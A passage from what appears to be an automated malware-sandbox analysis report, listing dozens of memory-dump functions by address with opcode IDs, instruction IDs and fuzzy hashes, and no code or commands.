              • Instruction Fuzzy Hash: 5BF0BB373512908FCF2556BA58107BE72CB9BC6652F94003ED109D7B80DDA6DC42D751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AC2B1, Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f38b31a320a9f3ca83a61dde3d4f612e1d607cf3314ea64e23075e5e0877d84e
              • Instruction ID: 46bdd506f153e6d8445595bdfb6b1411c1762a8786e16160f6b29c962eebd6ed
              • Opcode Fuzzy Hash: f38b31a320a9f3ca83a61dde3d4f612e1d607cf3314ea64e23075e5e0877d84e
              • Instruction Fuzzy Hash: 5E019E757042508FE346DB38E05872C3BA3FB89221F0905A9F85ACB7E5DA789C82CB44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A1218, Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2b97e9d0032f0768e75654017482648deb4426e36fdc47bf3ab3a2c1afb0a289
              • Instruction ID: 953e6ae44e3d04588d54932811bccc7c9b8361a917aae70e5f7b1f2ae81c59e1
              • Opcode Fuzzy Hash: 2b97e9d0032f0768e75654017482648deb4426e36fdc47bf3ab3a2c1afb0a289
              • Instruction Fuzzy Hash: 93016D313041148BC714DB29D058969B7EBFFD6600B2441ABE506CB374DF75DC4ACB82
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A61F8, Relevance: .0, Instructions: 40COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d76c2675985e8009b90dfa4077ff595e795054f3c1d8fe60e0fe79a6e05292f8
              • Instruction ID: d9eb1bedeed551f6ee1eeec8a895ab20bf7c32a0a8ca76d69c9b9f1d6d34181c
              • Opcode Fuzzy Hash: d76c2675985e8009b90dfa4077ff595e795054f3c1d8fe60e0fe79a6e05292f8
              • Instruction Fuzzy Hash: E4F0F032E502559FCBA08664E8106FEB7E6A7C5360F00407AC90AD7244EA294D06CAD2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AA6E9, Relevance: .0, Instructions: 40COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 980077da2fdd3f2437ead41e89970339311fd807360c13f8c9cac239c2668756
              • Instruction ID: a2fc345f4751faeed030f17f4a1934f73128b5e687205614e8e2104ec4ac73b2
              • Opcode Fuzzy Hash: 980077da2fdd3f2437ead41e89970339311fd807360c13f8c9cac239c2668756
              • Instruction Fuzzy Hash: F4F08134F00315DBDF05EBB4D881A9EB362FB98644F10852AD5055B288DF74DD1287A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A7298, Relevance: .0, Instructions: 40COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dd8a0dc700de9e4b3045119c4955940874a1b2a6a23359c8568a0787313d52c2
              • Instruction ID: 91b271ada2da97e2fca0084006662c69608aafc8f666417ea44ca8e22b5a926c
              • Opcode Fuzzy Hash: dd8a0dc700de9e4b3045119c4955940874a1b2a6a23359c8568a0787313d52c2
              • Instruction Fuzzy Hash: C6F0BB3130821453C664A66E5C80B6D7647BFC5670764471EB11DDB3D8DD619D0383A6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AA900, Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 27428e9a90e7bdb1a39f8cbb89b3d20ef1f02f24a9ca99096ee0c59e92925da8
              • Instruction ID: c28caee542c98a66614a298ceeb0862fc04e64628e235ae6e37ced04461c7765
              • Opcode Fuzzy Hash: 27428e9a90e7bdb1a39f8cbb89b3d20ef1f02f24a9ca99096ee0c59e92925da8
              • Instruction Fuzzy Hash: 0DF08131710200CBC750E7B9D44996D7BA7EB88251715856BE60BD7364EF71AC02CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A81D0, Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4d921856dca30afd25531169c2369404d1aeb60fcf93ff493475268c4a8b20b4
              • Instruction ID: f132059904e9fd7794a7b5be65e61209a6283f2d5834f71038bb43fdbcdf0823
              • Opcode Fuzzy Hash: 4d921856dca30afd25531169c2369404d1aeb60fcf93ff493475268c4a8b20b4
              • Instruction Fuzzy Hash: CCF09032A08206DFC710DAA498528BBBBF2FF45220B104477D116DB222E2758C43CFE5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A5DF0, Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e0202bffd06fe651bd52492134addd2874e7e9dde1d43391d5bc0c861c1f265c
              • Instruction ID: 035671b887ac13a1b25d8096d435d94d749943024f4edf6444aad5a54fab6364
              • Opcode Fuzzy Hash: e0202bffd06fe651bd52492134addd2874e7e9dde1d43391d5bc0c861c1f265c
              • Instruction Fuzzy Hash: 54F0F032E00211CBDF60C628A4111BEF7A2E784760F00007ACD0BD3241EA258D53CAC2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A58B9, Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d108927f6363d2d53ca3b889510aba18c1717fb9073bc1ffb72f7ba4313946fb
              • Instruction ID: b6a9ed8bd22cea80e085f25578dfb2e2a4adb7741346ed65ff7bac58f9a5478d
              • Opcode Fuzzy Hash: d108927f6363d2d53ca3b889510aba18c1717fb9073bc1ffb72f7ba4313946fb
              • Instruction Fuzzy Hash: 08F09072E402159FCB84EBBD940559FBBF9EB88230B11407AD409E3210FB788E42CBE5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A6208, Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 82e2500af7ed97176b49087b78378d623cabf4eecc42f7840840c2096d862af6
              • Instruction ID: 632622f62dccb2c70cfe75c5b946fdb4e7f4678b9477d5f382a482ebef4f2c97
              • Opcode Fuzzy Hash: 82e2500af7ed97176b49087b78378d623cabf4eecc42f7840840c2096d862af6
              • Instruction Fuzzy Hash: 2FF0BE32F042559ACB20D265D8106BFB7A797C5690F04406ACA0AD3388FA285E07CAD2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A9298, Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ebb2741ea391108453eb9497fbcaf7492d9b1951662ead143ebb786a13de1578
              • Instruction ID: ea036f6a041b7d6415df3ddb0b487c0bf71c5979b3fa6168a1cab5f281fe6c5f
              • Opcode Fuzzy Hash: ebb2741ea391108453eb9497fbcaf7492d9b1951662ead143ebb786a13de1578
              • Instruction Fuzzy Hash: 57F0C232F111069FDB549BB4D458AAEB7B6EF84300B208875EA05DB654EB30DC06CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AE6F8, Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 810ac487153035441fbe6e636164ec8eca90f789978189ded92c9c4081c2e945
              • Instruction ID: a3b4eb261b73aa72fc1bfca54b2a5d6ebc944026468175875405bcabb922457b
              • Opcode Fuzzy Hash: 810ac487153035441fbe6e636164ec8eca90f789978189ded92c9c4081c2e945
              • Instruction Fuzzy Hash: 7CF02E335043519BE736C59C8888761BACEA785314F04017AD9C6C7192D556DC42C7B1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AFAA9, Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d2ee3772287f52683b902c10802310b17e92b4ddc60d59236eb8dfee71f2eb4
              • Instruction ID: 8e7dfe2319ef11badb3031e4b5c780f7865f5f4729cc5cc259e11e6ca51af953
              • Opcode Fuzzy Hash: 1d2ee3772287f52683b902c10802310b17e92b4ddc60d59236eb8dfee71f2eb4
              • Instruction Fuzzy Hash: 9AF0AF36900218EFCB55DFA4C901AEAFFF9EF0A210F1080ABE558D6160E3318A50DF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A45B9, Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d87f4293b080b3f6df107e7212d702610e55b8dd7e2c24474f53dcbb0619dea3
              • Instruction ID: e49938c1dd05242e62eb7f6644cc3d39183f3164cdbed3d8a5ebdbe79c15d581
              • Opcode Fuzzy Hash: d87f4293b080b3f6df107e7212d702610e55b8dd7e2c24474f53dcbb0619dea3
              • Instruction Fuzzy Hash: 15F0BE31E4431A9FCB90CAA9AC05AEABBF8EB85220F11407FD208D7151E27849058B61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A0908, Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 53aa8e142d3e97a6b0ee71e4a34b1421c0b05623b75ee89d1035fc39cce5bb71
              • Instruction ID: 0638c7b10b04952c2dd81f7844cb11effb330cd12df0d4e24ffc69e921b3a3fe
              • Opcode Fuzzy Hash: 53aa8e142d3e97a6b0ee71e4a34b1421c0b05623b75ee89d1035fc39cce5bb71
              • Instruction Fuzzy Hash: DAF02732D293549FD750CBB4981CA6FBBFB5B86320B06449BD8079B216C9784C07CF92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A0918, Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8addaad2cf68846794c72c5a39409516a09c3a135ceaecc297dd5525a69cb723
              • Instruction ID: 8c58660d83c2d9839f099dc5c1540b3f4724e392c6cd6836370e3fb29db53327
              • Opcode Fuzzy Hash: 8addaad2cf68846794c72c5a39409516a09c3a135ceaecc297dd5525a69cb723
              • Instruction Fuzzy Hash: B5E0E533E292189B9B1096F598081AFB7AF9785370F0044279A1B93205DD758C03CAD2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AC59A, Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e29702288e7175d6167b857927773251ab80d1ee5a116fda712006d2cdc5dcc0
              • Instruction ID: 1acbf9a905a7dcd13f21d494a16b3932bbff01f15a8675853bfbeed9f546c62c
              • Opcode Fuzzy Hash: e29702288e7175d6167b857927773251ab80d1ee5a116fda712006d2cdc5dcc0
              • Instruction Fuzzy Hash: E3F0E5337010151FC369A6AAD414B6F36DB9BD5670B24422EF509D7B40DE72AC13CBE9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AE678, Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77aedff5f8da54647ce5f70dfad21f6b26f0dafa5c6ac3935d2d01600905f0ca
              • Instruction ID: 9dddbebaf1b76135b908bb03b402e767015690044db2f6f5171e7ad752e4726f
              • Opcode Fuzzy Hash: 77aedff5f8da54647ce5f70dfad21f6b26f0dafa5c6ac3935d2d01600905f0ca
              • Instruction Fuzzy Hash: 9EF0E2312082505BC351DA29C4108AA7FABDBC3510304485FD54ACB361DA22AD02CFA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A9EC1, Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 759106757328615d13520f76c7bfae13ba0d0816f5dd599bd2572ece5b37798c
              • Instruction ID: 0cec1b446d3c0badcc645cd520acede20283facfb31a5671f6c1b8eb291ea240
              • Opcode Fuzzy Hash: 759106757328615d13520f76c7bfae13ba0d0816f5dd599bd2572ece5b37798c
              • Instruction Fuzzy Hash: F5F0C27660C2808FC3559728A8555683FB3AFC221531888AFD14ADB392DE35AC0ACB41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A46A9, Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 925f00be413363f7ea018496d5b488fb8fbd12613e70d88aea95b92beb1721b8
              • Instruction ID: 03a5914388313849c95f4b62551620fe716d07a9df7f83eeb8adb9e21072bf70
              • Opcode Fuzzy Hash: 925f00be413363f7ea018496d5b488fb8fbd12613e70d88aea95b92beb1721b8
              • Instruction Fuzzy Hash: 6DF0EC327442518FCF515BF8A4645FD37E6EF81322B1440ABE40ACB671DD5E8C42CB82
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AFAB8, Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8f36132c8478747553eeaffdefcb86d5b3be69927a89e27e20b6c711d025b271
              • Instruction ID: 294f0a6d56304a18d2aaa6d1ae6eea8d8022c32723ea119400b0285d3e94aa1f
              • Opcode Fuzzy Hash: 8f36132c8478747553eeaffdefcb86d5b3be69927a89e27e20b6c711d025b271
              • Instruction Fuzzy Hash: A5F03036904218EF8B41EFA489049EDBFF5AF09210B1480ABE558D6161D6358A61DF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01550938, Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.910139948.0000000001550000.00000040.00000040.sdmp, Offset: 01550000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
              • Instruction ID: b4f621385b1f3673327083207bcf6673007c39eebee8a2002e46e163d7187e7a
              • Opcode Fuzzy Hash: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
              • Instruction Fuzzy Hash: BCF0FB35104645DFC706CB44D540B26FBA2FB89718F24CAA9E9490B752C337E813DA81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A9ED8, Relevance: .0, Instructions: 30COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bcec8dd252edba6703a126f530f0308948bc667e8112c6b2154d0e90bacaa728
              • Instruction ID: f5a99d2a13ca8c57fba6c803013496be4aa20a08fe5e8e0713437ddf5af483e3
              • Opcode Fuzzy Hash: bcec8dd252edba6703a126f530f0308948bc667e8112c6b2154d0e90bacaa728
              • Instruction Fuzzy Hash: 83F0A0323042008B8794A62DA4449AD7BA7EBC5364368883EE20ADB354CF72EC07CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A70E7, Relevance: .0, Instructions: 29COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c28e19977509ba53df5579c4bacc4b409e8ce64017a8fc5b533400d01c82e5e1
              • Instruction ID: 352a6b70dc33a47b3eeabed706095a48a4ba2a81b2c2eab1110184f1e425e617
              • Opcode Fuzzy Hash: c28e19977509ba53df5579c4bacc4b409e8ce64017a8fc5b533400d01c82e5e1
              • Instruction Fuzzy Hash: 8AF0153A7412104FCF58A3B9A4283ADB3929B80A19F844028D51ADBBC8EE214C01CB96
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AC8CE, Relevance: .0, Instructions: 29COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d5d891eb8a563f44bfc4bc41c763db9a49a7778f7f969471bfacf5c3ac23c78b
              • Instruction ID: 9a17da9cc5de973dfa56680e7154ede51eca8a43575b9cf6e04ce6e8ac54a9eb
              • Opcode Fuzzy Hash: d5d891eb8a563f44bfc4bc41c763db9a49a7778f7f969471bfacf5c3ac23c78b
              • Instruction Fuzzy Hash: D1E022333081908FC751A63840204AE3BABAFDA12131840EBF04ACB221CD618C07C7A2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A61A8, Relevance: .0, Instructions: 28COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e82386cdceb4ad7b5d5d87f40ff2f7a31647a243f40985040dfcbd524c3cee08
              • Instruction ID: 36563e383db239ec21947f88e204ad0022eb6db4815bed6be928babcad4c124f
              • Opcode Fuzzy Hash: e82386cdceb4ad7b5d5d87f40ff2f7a31647a243f40985040dfcbd524c3cee08
              • Instruction Fuzzy Hash: D3E09B32A4C256CFD79157E8E8545F83FD5DB4227171900AFC806C7163D5AD4C82CB53
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056ABB08, Relevance: .0, Instructions: 28COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: adaaf987f8a7102bc9ff850cf82fa4afc44771dee778652c5676eb1a6a3ccc47
              • Instruction ID: 28bc1e0a35cb50df9a4107c60449c0fc996adebf4dd1becb8aff461955fb7fa7
              • Opcode Fuzzy Hash: adaaf987f8a7102bc9ff850cf82fa4afc44771dee778652c5676eb1a6a3ccc47
              • Instruction Fuzzy Hash: ACF01732209B509FC325CF69D940816FBF6FF85220315CAAAD5EA87A65CA30F909CB55
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056ADE48, Relevance: .0, Instructions: 28COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ef24f71685204b843996110c2908212ceac4e186f8145987f735f4d0ebc95e21
              • Instruction ID: b6b0f46a59fe57201c4824f785b42349a7f906a52236f0226b69a48559b9f8f2
              • Opcode Fuzzy Hash: ef24f71685204b843996110c2908212ceac4e186f8145987f735f4d0ebc95e21
              • Instruction Fuzzy Hash: 4CE02B772046508FC351D268C160ABD7BA3EBE02203144C6FC55ACBB62EB77DC02CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AA830, Relevance: .0, Instructions: 27COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 397f3bf4e1851ee27618700866cee8822b442fc6b22c3cd1c1360aa495a74cb5
              • Instruction ID: 8b28de3b048de6df120c6b77eb1912a727051d05aa798233f72415f5a5a66091
              • Opcode Fuzzy Hash: 397f3bf4e1851ee27618700866cee8822b442fc6b22c3cd1c1360aa495a74cb5
              • Instruction Fuzzy Hash: 14E0E5327483414FD38157B894281593FE29B4623032505EFC016CB3E6CD688C53CB05
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AF8A9, Relevance: .0, Instructions: 27COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 443079f5fbeb43b2427e923a65c90b3b382d6e1b1aa4356ee2cb22c88d187423
              • Instruction ID: fb5cbc79b2bd0fce0385a811c166b92f1816cb737b7222f33b1629becf9ed4d8
              • Opcode Fuzzy Hash: 443079f5fbeb43b2427e923a65c90b3b382d6e1b1aa4356ee2cb22c88d187423
              • Instruction Fuzzy Hash: C7E0393BA09601CAD7E4DA50C650A72F7B7AF82609750551BC4839AA50DB35FCC3DF83
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A4708, Relevance: .0, Instructions: 27COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 773777fdec8bb234a674d5f89afefe7e925575869c903ffbdb4a2e381be8999b
              • Instruction ID: 8bb90088bdc4ef9a10a1c6f2b339aa442ea56fe95a0e4425673d368553e23225
              • Opcode Fuzzy Hash: 773777fdec8bb234a674d5f89afefe7e925575869c903ffbdb4a2e381be8999b
              • Instruction Fuzzy Hash: 5DE0DF336802808FCB6681A86800BFA739BC7C7662F50003FD405DBB50D9A69C43CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 015505F6, Relevance: .0, Instructions: 27COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.910139948.0000000001550000.00000040.00000040.sdmp, Offset: 01550000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: db01291b12fc94e929847f49c64066bcbef37130478e3d004b73692a7fb8fa30
              • Instruction ID: c3cdb295dee1026014ea9432caaa8fa0588bb13ae665278de686e051b13dad54
              • Opcode Fuzzy Hash: db01291b12fc94e929847f49c64066bcbef37130478e3d004b73692a7fb8fa30
              • Instruction Fuzzy Hash: B8E09276A007049BD650CF0AEC41452FBD8EB84630718C07FDC0D8B701E535F505CEA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014CAF0F, Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.910005449.00000000014C2000.00000040.00000001.sdmp, Offset: 014C2000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 23a19dd9ed69e5f93e802ab8b11f08afd46bca486f65215d5a5fa5b4fed88305
              • Instruction ID: 991199cb56d5b2dfd7df3231534c4c5902ba99f147ce222d49478b826ca6fe60
              • Opcode Fuzzy Hash: 23a19dd9ed69e5f93e802ab8b11f08afd46bca486f65215d5a5fa5b4fed88305
              • Instruction Fuzzy Hash: 29E0D872A0130467D2208E06DC45B52FB98DB40A30F14C557ED095B702E172B514CAF6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A8470, Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 65e81ffbbc4cf34b0357052da8667e24150c15977a346919c9d7d433562849e4
              • Instruction ID: 860d872ba90b4ba08d434cf413a56ac8b402f97f884b363e32cc54cd25c897ee
              • Opcode Fuzzy Hash: 65e81ffbbc4cf34b0357052da8667e24150c15977a346919c9d7d433562849e4
              • Instruction Fuzzy Hash: 27E092B6E066618BDB6146B4A8081287FE1E7492B1319025BE946D7395DA388C12CF92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A8480, Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 15b92a768fbc68d60cd10818abfe3733a0629b052ecdf5a4fbc85f2fbf0cee8d
              • Instruction ID: 4e0fecca01ea7ef91d3f969bd78cc1f7e983c523e3451be085fc61c95f5a663c
              • Opcode Fuzzy Hash: 15b92a768fbc68d60cd10818abfe3733a0629b052ecdf5a4fbc85f2fbf0cee8d
              • Instruction Fuzzy Hash: 4AE09236F012248BCBB05AB8B4181287AEAEB4C6A1715412AED0BD7308CE309C118FD2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056ADE58, Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad712b8dffbb7d54aa32ffca10b4cce7a7148da1e2580d8a2a9b84385efe91de
              • Instruction ID: d60a71038ff89b8d2709cd833bd54edc3bc8fcf408cede0cf048aae87a276a62
              • Opcode Fuzzy Hash: ad712b8dffbb7d54aa32ffca10b4cce7a7148da1e2580d8a2a9b84385efe91de
              • Instruction Fuzzy Hash: 76E02037304110574350D65DC410DAE77ABEBD5620300882FC51A9B711DF72EC02CFD0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AE688, Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6997097da4d5eeaf086403561c1808c9952834e4d79a27c8f30bbe2b5aad8c40
              • Instruction ID: 88aebf93b187cb6b07cdd19f85d50fd865a717e85183c443091dc24fe531059f
              • Opcode Fuzzy Hash: 6997097da4d5eeaf086403561c1808c9952834e4d79a27c8f30bbe2b5aad8c40
              • Instruction Fuzzy Hash: 65E04F363146215B8764D66DC4109AE7B9FEBC5A203558C6ED60A9B760EF73EC028BA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0E48, Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cdaeaa13900a849382496c1ade37811c752312acdc2d8c200cb4b7878cbf632b
              • Instruction ID: 4e74b8e5c9eb1f5f175a46e373465d702d9358a88de3d37bcc4fd7429e328a40
              • Opcode Fuzzy Hash: cdaeaa13900a849382496c1ade37811c752312acdc2d8c200cb4b7878cbf632b
              • Instruction Fuzzy Hash: 7FE0DF3530021127D258D9ACC8419B9B7DEEBD2A61B04885FF549DB2A1DB72980287D0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD05FD, Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 60b4cf20c25d56148cd891b28a200b02600f18eb458fe4f566db853fac8d60fe
